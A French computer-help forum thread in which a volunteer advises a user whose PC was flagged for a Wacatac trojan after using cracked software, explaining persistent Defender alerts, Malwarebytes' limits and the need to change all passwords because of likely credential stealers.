Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Evaluer le site malekal.com
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
- Messages : 19246
- Inscription : 02 juin 2012 20:48
- Localisation : Thomas Anderson : Je suis dans et en dehors de la matrice :-)
Re: Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe [résolu]
Il faut savoir que ce raconte Defender reste en place au moins une semaine MEME si l'infection est virée
C'est juste informatif
En plus tu as installé MBAM (qui se prend pour un antivirus) qui a pris le relais
MBAM faut lui "couper les pattes" pour qu'il ne se comporte QUE comme un scanner à la demande et pas avec un service en arrière plan et voulant se substituer à Defender
Il est bon pour certaines classes d' infections mais il n'est pas un anti virus
Du reste si tu as lu les liens donnés il faut savoir qu''un AV quelle qu'il soit ne bloquera pas les infections via Powershell, pour la simple raison qu'il ne SAIT PAS si la commande est passée du fait de l'utilisateur ou d'une infection
A la rigueur si c'est mal fait du fait du comportement il "peut" se douter de quelque chose mais c'est tout
C'est comme certains PUP's etc.; Un AV ne sait pas si l'utilisateur a consenti ou pas lors de l'installation d'un programme
Ensuite tu dis que tu avais téléchargé un autre crack il y a quelques mois (Produit Adobe) mais que tu as réinstallé Windows depuis (sans perte de données visiblement)
Donc si infection il y a eu elle a disparu, même des rapports, par contre vu que dans la majorité des cas il vient avec un stealer (relire le lien sur les cracks et stealers) tu peux être certain que TOUS les login mot de passe de comptes de jeux, mail, sites ... SONT VOLES
Idem pour tout ce qui traine en tant que documents etc qui peuvent donner des infos sur ton identité surtout ou pour accéder à des données bancaires
Ce n'est pas parce que l'infection est virée que les conséquences disparaissent avec
Donc comme le souligne Malekal tu dois CHANGER TOUS LES MOTS DE PASSE
Les conséquences je les ai donné dans le lien sur les cracks
MAIS tu peux être certain que les données volées sont soient exploitées soient seront exploitées (les malfaisants en récupèrent tellement que si le compte est intéressant dont ceux avec Instagram par ex ils vont s'y atteler, soit si c'est considéré comme secondaire cela peut prendre quelques mois
Mais rien ne dit que meme si pas exploitées ca ne sera pas revendu sur les places de marché (ou meme gratuitement pour attirer le client)
Mais en général ils exploitent et revendent (double bénéfice)
Je n'ai pas de compte ygg.torrent donc je ne peux pas voir ce qu'il en est, mais là aussi tu peux récupérer divers trojan de toutes les façons vu que les produits Adobe et de musiques sont majoritairement ciblés par divers malwares
C'est juste informatif
En plus tu as installé MBAM (qui se prend pour un antivirus) qui a pris le relais
MBAM faut lui "couper les pattes" pour qu'il ne se comporte QUE comme un scanner à la demande et pas avec un service en arrière plan et voulant se substituer à Defender
Il est bon pour certaines classes d' infections mais il n'est pas un anti virus
Du reste si tu as lu les liens donnés il faut savoir qu''un AV quelle qu'il soit ne bloquera pas les infections via Powershell, pour la simple raison qu'il ne SAIT PAS si la commande est passée du fait de l'utilisateur ou d'une infection
A la rigueur si c'est mal fait du fait du comportement il "peut" se douter de quelque chose mais c'est tout
C'est comme certains PUP's etc.; Un AV ne sait pas si l'utilisateur a consenti ou pas lors de l'installation d'un programme
Ensuite tu dis que tu avais téléchargé un autre crack il y a quelques mois (Produit Adobe) mais que tu as réinstallé Windows depuis (sans perte de données visiblement)
Donc si infection il y a eu elle a disparu, même des rapports, par contre vu que dans la majorité des cas il vient avec un stealer (relire le lien sur les cracks et stealers) tu peux être certain que TOUS les login mot de passe de comptes de jeux, mail, sites ... SONT VOLES
Idem pour tout ce qui traine en tant que documents etc qui peuvent donner des infos sur ton identité surtout ou pour accéder à des données bancaires
Ce n'est pas parce que l'infection est virée que les conséquences disparaissent avec
Donc comme le souligne Malekal tu dois CHANGER TOUS LES MOTS DE PASSE
Les conséquences je les ai donné dans le lien sur les cracks
MAIS tu peux être certain que les données volées sont soient exploitées soient seront exploitées (les malfaisants en récupèrent tellement que si le compte est intéressant dont ceux avec Instagram par ex ils vont s'y atteler, soit si c'est considéré comme secondaire cela peut prendre quelques mois
Mais rien ne dit que meme si pas exploitées ca ne sera pas revendu sur les places de marché (ou meme gratuitement pour attirer le client)
Mais en général ils exploitent et revendent (double bénéfice)
Je n'ai pas de compte ygg.torrent donc je ne peux pas voir ce qu'il en est, mais là aussi tu peux récupérer divers trojan de toutes les façons vu que les produits Adobe et de musiques sont majoritairement ciblés par divers malwares
- Only Amiga... Was possible ! Lien https://forum.malekal.com/viewtopic.php?t=60830
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- Messages : 7
- Inscription : 04 sept. 2024 22:09
Re: Trojan:Win32/Wacatac.H!ml : Registry Cleaner / rp.exe [résolu]
Merci a tout les 2, votre site est une mine d'or d'ailleurs !
-
- Sujets similaires
- Réponses
- Vues
- Dernier message
-
- 8 Réponses
- 217 Vues
-
Dernier message par Parisien_entraide
-
- 4 Réponses
- 119 Vues
-
Dernier message par Mite
-
- 3 Réponses
- 64 Vues
-
Dernier message par Malekal_morte
-
- 8 Réponses
- 388 Vues
-
Dernier message par Malekal_morte
-
- 3 Réponses
- 159 Vues
-
Dernier message par Malekal_morte